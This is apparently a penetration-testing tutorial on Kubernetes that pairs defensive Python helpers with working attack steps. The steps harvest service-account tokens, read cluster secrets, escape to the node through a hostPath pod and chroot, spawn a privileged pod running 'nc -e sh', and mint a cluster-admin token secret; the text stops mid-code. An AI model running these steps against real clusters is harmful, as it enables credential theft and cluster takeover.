# Kubernetes Enumeration

{{#include ../../banners/hacktricks-training.md}}

## Kubernetes Tokens

If you have compromised access to a machine, the user may have access to some Kubernetes platform. The token is usually located in a file pointed to by the **env var `KUBECONFIG`** or **inside `~/.kube`**.

In this folder you can find config files with **tokens and configurations to connect to the API server**. In this folder you can also find a cache folder with information previously retrieved.

If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8s environment:

### Service Account Tokens

Before continuing, if you don't know what a service is in Kubernetes I would suggest you **follow this link and read at least the information about Kubernetes architecture.**

Taken from the [Kubernetes documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server):

_"When you create a pod, if you do not specify a service account, it is automatically assigned the_ default _service account in the same namespace."_

**ServiceAccount** is an object managed by Kubernetes and used to provide an identity for processes that run in a pod.\
Every service account has a secret related to it and this secret contains a bearer token. This is a JSON Web Token (JWT), a method for representing claims securely between two parties.

Usually **one** of the directories:

- `/run/secrets/kubernetes.io/serviceaccount`
- `/var/run/secrets/kubernetes.io/serviceaccount`
- `/secrets/kubernetes.io/serviceaccount`

contains the files:

- **ca.crt**: The CA certificate used to verify the TLS certificate of the kubernetes API server
- **namespace**: Indicates the current namespace
- **token**: Contains the **service token** of the current pod.

Now that you have the token, you can find the API server inside the environment variable **`KUBECONFIG`**.
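As an added example that is not part of the original page, the following Python reads the claims inside a service-account token you found (no signature check: a pod never has the cluster's `sa.pub`) and reports which namespace, service account and pod it belongs to and whether it can expire at all, which is the first thing to establish when triaging a leaked token. The two sample tokens are constructed, unsigned test data; `_fake_jwt`, `SAMPLE_BOUND` and `SAMPLE_LEGACY` are this example's own names.

```python
import base64
import json
import time
from typing import Optional


def _b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def jwt_claims(token: str) -> dict:
    """Payload claims of a JWT, read WITHOUT verifying the signature.

    Verifying needs the cluster's sa.pub, which a pod never has; this only
    reads what the token says about itself.
    """
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT: expected header.payload.signature")
    return json.loads(_b64url_decode(parts[1]))


def describe_sa_token(token: str, now: Optional[int] = None) -> dict:
    """Whose token is this, and can it expire? Handles both formats:
    bound tokens (projected volume / TokenRequest) carry a nested
    'kubernetes.io' claim, an 'exp' and the pod they are bound to; legacy
    secret-based tokens carry flat 'kubernetes.io/serviceaccount/*' claims
    and no 'exp', so a leaked one stays valid until the secret is deleted.
    """
    c = jwt_claims(token)
    now = int(time.time()) if now is None else now
    bound = c.get("kubernetes.io")
    if isinstance(bound, dict):
        kind, namespace = "bound", bound.get("namespace")
        sa_name = (bound.get("serviceaccount") or {}).get("name")
        pod = (bound.get("pod") or {}).get("name")
    else:
        kind, pod = "legacy-secret", None
        namespace = c.get("kubernetes.io/serviceaccount/namespace")
        sa_name = c.get("kubernetes.io/serviceaccount/service-account.name")
    exp = c.get("exp")
    return {
        "kind": kind, "subject": c.get("sub"), "issuer": c.get("iss"),
        "namespace": namespace, "serviceaccount": sa_name, "pod": pod,
        "audiences": c.get("aud"),
        "expires_in_s": None if exp is None else exp - now,
        "expired": exp is not None and exp <= now,
    }


def _fake_jwt(payload: dict) -> str:
    """Constructed, unsigned sample token for offline use (test data only)."""
    def enc(d):
        return base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b"=").decode()
    head = enc({"alg": "RS256", "kid": "sample"})
    return f"{head}.{enc(payload)}.c2lnbmF0dXJl"


# Constructed sample: a bound token as the projected volume would mount it.
SAMPLE_BOUND = _fake_jwt({
    "aud": ["https://kubernetes.default.svc"], "iss": "https://kubernetes.default.svc",
    "exp": 1700003600, "iat": 1700000000, "nbf": 1700000000,
    "kubernetes.io": {"namespace": "default",
                      "pod": {"name": "web-7c9d", "uid": "constructed-pod-uid"},
                      "serviceaccount": {"name": "default", "uid": "constructed-sa-uid"}},
    "sub": "system:serviceaccount:default:default",
})
# Constructed sample: a legacy secret-based token (no exp, no pod binding).
SAMPLE_LEGACY = _fake_jwt({
    "iss": "kubernetes/serviceaccount",
    "kubernetes.io/serviceaccount/namespace": "kube-system",
    "kubernetes.io/serviceaccount/secret.name": "admin-sa-token-abcde",
    "kubernetes.io/serviceaccount/service-account.name": "admin-sa",
    "sub": "system:serviceaccount:kube-system:admin-sa",
})
```

A legacy token with no `exp` is the higher-risk finding: rotating it means deleting the secret, not waiting it out.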
For more details run `(env || set) | grep -iE "kuber|kube"`

The service account token is signed by the key residing in the file **sa.key** and validated by **sa.pub**.

Default location on **Kubernetes**:

- /etc/kubernetes/pki

Default location on **Minikube**:

- /var/lib/localkube/certs

### Hot Pods

_**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc.

## RBAC

If you don't know what **RBAC** is, **read this section**.

## GUI Applications

- **k9s**: A GUI that enumerates a kubernetes cluster from the terminal. Check the commands in [https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Type `:namespace` and select all of them to then search resources in all the namespaces.
- **k8slens**: It gives some free days of trial: [https://k8slens.dev/](https://k8slens.dev/)

## Enumeration CheatSheet

In order to enumerate a K8s environment you need a couple of things:

- A **valid authentication token**. In the previous section we saw where to search for a user token and for a service account token.
- The **address (`https://host:port`) of the Kubernetes API**. This can usually be found in the environment variables and/or in the kube config file.
- **Optional**: The **ca.crt to verify the API server**. This can be found in the same places the token can be found. This is useful to verify the API server certificate, but using `--insecure-skip-tls-verify` with `kubectl` or `-k` with `curl` you won't need it.

With those details you can **enumerate kubernetes**. If the **API** for some reason is accessible through the **Internet**, you can just download that info and enumerate the platform from your host.
However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload** the [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server.

### Differences between `list` and `get` verbs

With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API:

```
GET /apis/apps/v1/namespaces/{namespace}/deployments/{name}
```

If you have the **`list`** permission, you are allowed to execute API requests to list a type of asset (_`get` option in `kubectl`_):

```bash
#In a namespace
GET /apis/apps/v1/namespaces/{namespace}/deployments
#In all namespaces
GET /apis/apps/v1/deployments
```

If you have the **`watch`** permission, you are allowed to execute API requests to monitor assets:

```
GET /apis/apps/v1/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments/{name} [DEPRECATED]
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments [DEPRECATED]
GET /apis/apps/v1/watch/deployments [DEPRECATED]
```

They open a streaming connection that returns you the full manifest of a Deployment whenever it changes (or when a new one is created).

> [!CAUTION]
> The following `kubectl` commands indicate just how to list the objects.
> If you want to access the data you need to use `describe` instead of `get`

### Using curl

From inside a pod you can use several env variables:

```bash
export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
# if kurl still gets a certificate error, add the -k option to skip verification
```

> [!WARNING]
> By default the pod can **access** the **kube-api server** at the domain name **`kubernetes.default.svc`**, and you can see the kube network in **`/etc/resolv.conf`**: there you will find the address of the kubernetes DNS server (the ".1" of that same range is the kube-api endpoint).

### Using kubectl

Having the token and the address of the API server you use kubectl or curl to access it as indicated here:

By default, the APISERVER is addressed with the `https://` scheme

```bash
alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true'
# Add --all-namespaces to a command to always search in all namespaces
```

> if there is no `https://` in the url, you may get an error like Bad Request.

You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). The goal of the following sections is to present in an ordered way the different options to enumerate and understand the new K8s you got access to.
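Added example, not the page's code: a helper for the "Get Current Privileges" step below, which turns the SelfSubjectRulesReview response the API returns into a short list of the sensitive permissions the rest of this page goes on to look for (secrets, pod creation, exec, role and binding creation). The `SENSITIVE` table and the sample response are this example's own constructed assumptions.

```python
import json

# (apiGroup, resource, verb) -> why it matters. "" is the core API group.
SENSITIVE = {
    ("", "secrets", "list"): "read every secret in the namespace",
    ("", "secrets", "get"): "read secrets by name",
    ("", "pods", "create"): "create pods (hostPath / privileged pod escapes)",
    ("", "pods/exec", "create"): "exec into running pods",
    ("", "serviceaccounts/token", "create"): "mint tokens for other service accounts",
    ("rbac.authorization.k8s.io", "roles", "create"): "create Roles",
    ("rbac.authorization.k8s.io", "rolebindings", "create"): "bind Roles to subjects",
    ("rbac.authorization.k8s.io", "clusterrolebindings", "create"): "bind ClusterRoles",
}


def _grants(rule: dict, group: str, resource: str, verb: str) -> bool:
    """Does one resourceRule grant verb on group/resource? '*' is a wildcard.
    A rule naming 'pods' does not cover the 'pods/exec' subresource; '*' does."""
    def hit(values, wanted):
        return any(v in ("*", wanted) for v in values or [])
    return (hit(rule.get("apiGroups"), group) and hit(rule.get("resources"), resource)
            and hit(rule.get("verbs"), verb))


def triage_rules_review(review: dict) -> list:
    """Turn a SelfSubjectRulesReview response into sorted (group, resource, verb,
    why) findings for every SENSITIVE entry some resourceRule grants.

    Rules with resourceNames are skipped: they grant named objects only, not the
    whole type. An 'incomplete' status means the authorizer could not enumerate
    everything, so the list may be too short; that is reported as a finding.
    """
    status = review.get("status") or {}
    rules = [r for r in status.get("resourceRules") or [] if not r.get("resourceNames")]
    findings = [(g, r, v, why) for (g, r, v), why in SENSITIVE.items()
                if any(_grants(rule, g, r, v) for rule in rules)]
    if status.get("incomplete"):
        findings.append(("", "", "", "review incomplete: rules may be missing"))
    return sorted(findings)


# Constructed sample response, shaped like the object returned by POSTing to
# /apis/authorization.k8s.io/v1/selfsubjectrulesreviews for namespace "default".
SAMPLE_REVIEW = json.loads("""{
  "kind": "SelfSubjectRulesReview", "apiVersion": "authorization.k8s.io/v1",
  "spec": {"namespace": "default"},
  "status": {"incomplete": false, "nonResourceRules": [],
    "resourceRules": [
      {"verbs": ["get", "list", "watch"], "apiGroups": [""], "resources": ["pods", "pods/log"]},
      {"verbs": ["create"], "apiGroups": [""], "resources": ["pods/exec"]},
      {"verbs": ["get"], "apiGroups": [""], "resources": ["secrets"], "resourceNames": ["app-config"]},
      {"verbs": ["create"], "apiGroups": ["rbac.authorization.k8s.io"], "resources": ["rolebindings"]}
    ]}
}""")

if __name__ == "__main__":
    for group, resource, verb, why in triage_rules_review(SAMPLE_REVIEW):
        print(f"{verb:7} {group or 'core'}/{resource}: {why}")
```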
To get the HTTP request that `kubectl` sends you can use the parameter `-v=8`

#### MitM kubectl - Proxifying kubectl

```bash
# Launch burp
# Set proxy
export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=http://localhost:8080
# Launch kubectl
kubectl get namespace --insecure-skip-tls-verify=true
```

### Current Configuration

{{#tabs }}
{{#tab name="Kubectl" }}
```bash
kubectl config get-users
kubectl config get-contexts
kubectl config get-clusters
kubectl config current-context

# Change namespace
kubectl config set-context --current --namespace=<namespace>
```
{{#endtab }}
{{#endtabs }}

If you managed to steal some user credentials you can configure them locally using something like:

```bash
kubectl config set-credentials USER_NAME \
  --auth-provider=oidc \
  --auth-provider-arg=idp-issuer-url=( issuer url ) \
  --auth-provider-arg=client-id=( your client id ) \
  --auth-provider-arg=client-secret=( your client secret ) \
  --auth-provider-arg=refresh-token=( your refresh token ) \
  --auth-provider-arg=idp-certificate-authority=( path to your ca certificate ) \
  --auth-provider-arg=id-token=( your id_token )
```

### Get Supported Resources

With this info you will know all the services you can list

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k api-resources --namespaced=true #Resources specific to a namespace
k api-resources --namespaced=false #Resources NOT specific to a namespace
```
{{#endtab }}
{{#endtabs }}

### Get Current Privileges

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k auth can-i --list #Get privileges in general
k auth can-i --list -n custnamespace #Get privileges in custnamespace

# Get service account permissions
k auth can-i --list --as=system:serviceaccount:<namespace>:<sa-name> -n <namespace>
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -i -s -k -X $'POST' \
  -H $'Content-Type: application/json' \
  --data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \
  "https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"
```
{{#endtab }}
{{#endtabs }}

Another way to check your privileges is using the tool: [**https://github.com/corneliusweig/rakkess**](https://github.com/corneliusweig/rakkess)

You can learn more about **Kubernetes RBAC** in:

{{#ref}}
kubernetes-role-based-access-control-rbac.md
{{#endref}}

**Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges:

{{#ref}}
abusing-roles-clusterroles-in-kubernetes/
{{#endref}}

### Get Others roles

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get roles
k get clusterroles
```
{{#endtab }}
{{#tab name="API" }}
```bash
# Roles and ClusterRoles live in the rbac.authorization.k8s.io group; ClusterRoles are not namespaced
kurl -k -v "https://$APISERVER/apis/rbac.authorization.k8s.io/v1/namespaces/eevee/roles?limit=500"
kurl -k -v "https://$APISERVER/apis/rbac.authorization.k8s.io/v1/clusterroles?limit=500"
```
{{#endtab }}
{{#endtabs }}

### Get namespaces

Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**.
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get namespaces
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -k -v https://$APISERVER/api/v1/namespaces/
```
{{#endtab }}
{{#endtabs }}

### Get secrets

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get secrets -o yaml
k get secrets -o yaml -n custnamespace
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/default/secrets/
kurl -v https://$APISERVER/api/v1/namespaces/custnamespace/secrets/
```
{{#endtab }}
{{#endtabs }}

If you can read secrets you can use the following lines to get the privileges related to each token:

```bash
for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done
```

### Get Service Accounts

As discussed at the beginning of this page, **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where they are running may allow a user to escalate privileges.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get serviceaccounts
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -k -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/serviceaccounts
```
{{#endtab }}
{{#endtabs }}

### Get Deployments

Deployments specify the **components** that need to be **run**.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get deployments
k get deployments -n custnamespace
```
{{#endtab }}
{{#tab name="API" }}
```bash
# Deployments are in the apps/v1 group, not the core /api/v1 path
kurl -v https://$APISERVER/apis/apps/v1/namespaces/${NAMESPACE}/deployments
```
{{#endtab }}
{{#endtabs }}

### Get Pods

The Pods are the actual **containers** that will be **running**.
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get pods
k get pods -n custnamespace
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/pods
```
{{#endtab }}
{{#endtabs }}

### Get Services

Kubernetes **services** are used to **expose a service on a specific port and IP** (which will act as a load balancer for the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get services
k get services -n custnamespace
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/default/services/
```
{{#endtab }}
{{#endtabs }}

### Get nodes

Get all the **nodes configured inside the cluster**.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get nodes
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/nodes/
```
{{#endtab }}
{{#endtabs }}

### Get DaemonSets

**DaemonSets** allow ensuring that a **specific pod is running on all the nodes** of the cluster (or on the selected ones). If you delete the DaemonSet, the pods managed by it will also be removed.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get daemonsets
```
{{#endtab }}
{{#tab name="API" }}
```bash
# DaemonSets are served from apps/v1 (extensions/v1beta1 was removed in Kubernetes 1.16)
kurl -v https://$APISERVER/apis/apps/v1/namespaces/default/daemonsets
```
{{#endtab }}
{{#endtabs }}

### Get cronjob

Cron jobs allow scheduling, using a crontab-like syntax, the launch of a pod that will perform some action.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get cronjobs
```
{{#endtab }}
{{#tab name="API" }}
```bash
# CronJobs are served from batch/v1 (batch/v1beta1 was removed in Kubernetes 1.25)
kurl -v https://$APISERVER/apis/batch/v1/namespaces/${NAMESPACE}/cronjobs
```
{{#endtab }}
{{#endtabs }}

### Get configMap

configMap always contains a lot of information and config files that are supplied to the apps running in kubernetes. Usually you can find a lot of passwords, secrets and tokens used to connect and authenticate to other internal/external services.
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get configmaps # -n namespace
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps
```
{{#endtab }}
{{#endtabs }}

### Get Network Policies / Cilium Network Policies

{{#tabs }}
{{#tab name="First Tab" }}
```bash
k get networkpolicies
k get CiliumNetworkPolicies
k get CiliumClusterwideNetworkPolicies
```
{{#endtab }}
{{#endtabs }}

### Get everything / all

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get all
```
{{#endtab }}
{{#endtabs }}

### **Get all helm-managed resources**

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get all --all-namespaces -l='app.kubernetes.io/managed-by=Helm'
```
{{#endtab }}
{{#endtabs }}

### **Get Pods consumptions**

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k top pod --all-namespaces
```
{{#endtab }}
{{#endtabs }}

## Interacting with the cluster without using kubectl

Since the Kubernetes control plane exposes a RESTful API, you can craft HTTP requests by hand and send them with other tools, such as **curl** or **wget**.

### Escaping from the pod

If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's filesystem. You can use already existing pods as reference for the yaml file since they display existing images and paths.

```bash
kubectl get pod [-n <namespace>] -o yaml
```

> if you need to create a pod on a specific node you can use the following command to get the labels on the node
>
> `k get nodes --show-labels`
>
> By default, kubernetes.io/hostname and node-role.kubernetes.io/master are good labels to choose.
Then you create your attacker.yaml file

```yaml
apiVersion: v1
kind: Pod
metadata:
  labels:
    run: attacker-pod
  name: attacker-pod
  namespace: default
spec:
  volumes:
  - name: host-fs
    hostPath:
      path: /
  containers:
  - image: ubuntu
    imagePullPolicy: Always
    name: attacker-pod
    command: ["/bin/sh", "-c", "sleep infinity"]
    volumeMounts:
    - name: host-fs
      mountPath: /root
  restartPolicy: Never
  # nodeName and nodeSelector: enable one of them when you need to create the pod on a specific node
  #nodeName: master
  #nodeSelector:
  #  kubernetes.io/hostname: master
  #  # or using
  #  node-role.kubernetes.io/master: ""
```

After that you create the pod

```bash
kubectl apply -f attacker.yaml [-n <namespace>]
```

Now you can switch to the created pod as follows

```bash
kubectl exec -it attacker-pod [-n <namespace>] -- sh
# attacker-pod is the name defined in the yaml file
```

And finally you chroot into the node's filesystem.

```bash
chroot /root /bin/bash
```

Information obtained from:
[Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)
[Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)

### Create a privileged pod

The corresponding yaml file is as follows:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-exec-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: alpine
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "nc -e sh" ]
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
  volumes:
  - name: noderoot
    hostPath:
      path: /
```

Create the pod using curl:

```bash
CONTROL_PLANE_HOST=""   # host:port of the API server
TOKEN=""                # bearer token
# curl computes Content-Length itself; a hard-coded value that does not match the
# body makes the server wait for more data or reject the request, so none is set here.
curl --path-as-is -i -s -k -X $'POST' \
  -H "Host: $CONTROL_PLANE_HOST" \
  -H "Authorization: Bearer $TOKEN" \
  -H $'Accept: application/json' \
  -H $'Content-Type: application/json' \
  -H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
  -H $'Accept-Encoding: gzip, deflate, br' \
  --data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"labels\":{\"app\":\"pentest\"},\"name\":\"everything-allowed-exec-pod\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"args\":[\"nc -e sh\"],\"command\":[\"/bin/sh\",\"-c\",\"--\"],\"image\":\"alpine\",\"name\":\"everything-allowed-pod\",\"securityContext\":{\"privileged\":true},\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"noderoot\"}]}],\"hostIPC\":true,\"hostNetwork\":true,\"hostPID\":true,\"volumes\":[{\"hostPath\":{\"path\":\"/\"},\"name\":\"noderoot\"}]}}\x0a' \
  "https://$CONTROL_PLANE_HOST/api/v1/namespaces/default/pods?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```

### Delete pod

Delete the pod using curl:

```bash
CONTROL_PLANE_HOST=""
TOKEN=""
POD_NAME="everything-allowed-exec-pod"
curl --path-as-is -i -s -k -X $'DELETE' \
  -H "Host: $CONTROL_PLANE_HOST" \
  -H "Authorization: Bearer $TOKEN" \
  -H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
  -H $'Accept: application/json' \
  -H $'Content-Type: application/json' \
  -H $'Accept-Encoding: gzip, deflate, br' \
  --data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
  "https://$CONTROL_PLANE_HOST/api/v1/namespaces/default/pods/$POD_NAME"
```

### Create Service Account

```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'POST' \
  -H "Host: $CONTROL_PLANE_HOST" \
  -H "Authorization: Bearer $TOKEN" \
  -H $'Content-Type: application/json' \
  -H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
  -H $'Accept: application/json' \
  -H $'Accept-Encoding: gzip, deflate, br' \
  --data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"ServiceAccount\",\"metadata\":{\"name\":\"secrets-manager-sa-2\",\"namespace\":\"default\"}}\x0a' \
  "https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/serviceaccounts?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```

### Delete Service Account

```bash
CONTROL_PLANE_HOST=""
TOKEN=""
SA_NAME=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'DELETE' \
  -H "Host: $CONTROL_PLANE_HOST" \
  -H "Authorization: Bearer $TOKEN" \
  -H $'Accept: application/json' \
  -H $'Content-Type: application/json' \
  -H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
  -H $'Accept-Encoding: gzip, deflate, br' \
  --data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
  "https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/serviceaccounts/$SA_NAME"
```

### Create Role

```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'POST' \
  -H "Host: $CONTROL_PLANE_HOST" \
  -H "Authorization: Bearer $TOKEN" \
  -H $'Content-Type: application/json' \
  -H $'Accept: application/json' \
  -H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
  -H $'Accept-Encoding: gzip, deflate, br' \
  --data-binary $'{\"apiVersion\":\"rbac.authorization.k8s.io/v1\",\"kind\":\"Role\",\"metadata\":{\"name\":\"secrets-manager-role\",\"namespace\":\"default\"},\"rules\":[{\"apiGroups\":[\"\"],\"resources\":[\"secrets\"],\"verbs\":[\"get\",\"create\"]}]}\x0a' \
  "https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/roles?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```

### Delete Role

```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
ROLE_NAME=""
curl --path-as-is -i -s -k -X $'DELETE' \
  -H "Host: $CONTROL_PLANE_HOST" \
  -H "Authorization: Bearer $TOKEN" \
  -H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
  -H $'Accept: application/json' \
  -H $'Content-Type: application/json' \
  -H $'Accept-Encoding: gzip, deflate, br' \
  --data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
  "https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/roles/$ROLE_NAME"
```

### Create Role Binding

```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'POST' \
  -H "Host: $CONTROL_PLANE_HOST" \
  -H "Authorization: Bearer $TOKEN" \
  -H $'Accept: application/json' \
  -H $'Content-Type: application/json' \
  -H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
  -H $'Accept-Encoding: gzip, deflate, br' \
  --data-binary $'{\"apiVersion\":\"rbac.authorization.k8s.io/v1\",\"kind\":\"RoleBinding\",\"metadata\":{\"name\":\"secrets-manager-role-binding\",\"namespace\":\"default\"},\"roleRef\":{\"apiGroup\":\"rbac.authorization.k8s.io\",\"kind\":\"Role\",\"name\":\"secrets-manager-role\"},\"subjects\":[{\"apiGroup\":\"\",\"kind\":\"ServiceAccount\",\"name\":\"secrets-manager-sa\",\"namespace\":\"default\"}]}\x0a' \
  "https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/rolebindings?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```

### Delete Role Binding

```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
ROLE_BINDING_NAME=""
curl --path-as-is -i -s -k -X $'DELETE' \
  -H "Host: $CONTROL_PLANE_HOST" \
  -H "Authorization: Bearer $TOKEN" \
  -H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
  -H $'Accept: application/json' \
  -H $'Content-Type: application/json' \
  -H $'Accept-Encoding: gzip, deflate, br' \
  --data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
  "https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/rolebindings/$ROLE_BINDING_NAME"
```

### Create Secret

```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'POST' \
  -H "Host: $CONTROL_PLANE_HOST" \
  -H "Authorization: Bearer $TOKEN" \
  -H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
  -H $'Accept: application/json' \
  -H $'Content-Type: application/json' \
  -H $'Accept-Encoding: gzip, deflate, br' \
  --data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{\"kubernetes.io/service-account.name\":\"cluster-admin-sa\"},\"name\":\"stolen-admin-sa-token\",\"namespace\":\"default\"},\"type\":\"kubernetes.io/service-account-token\"}\x0a' \
  "https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/secrets?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```

### Delete Secret

```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
SECRET_NAME=""
curl --path-as-is -i -s -k -X $'DELETE' \
  -H "Host: $CONTROL_PLANE_HOST" \
  -H "Authorization: Bearer $TOKEN" \
  -H $'Content-Type: application/json' \
  -H $'Accept: application/json' \
  -H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
  -H $'Accept-Encoding: gzip, deflate, br' \
  --data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
  "https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/secrets/$SECRET_NAME"
```

## References

{{#ref}}
https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3
{{#endref}}
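Closing added example, not code from the page or the posts it cites: the policy check a cluster admin would run against the attacker-pod and everything-allowed-exec-pod manifests shown above, flagging the hostPath, privileged and host-namespace settings those escapes depend on. The two sample manifests are copied from this page (command/args trimmed), the `hardened-web` pod is constructed, and the checks are this example's own approximation of the Pod Security Standards baseline controls rather than upstream code.

```python
def pod_findings(pod: dict) -> list:
    """List the settings that give a pod a way onto its node: host namespaces,
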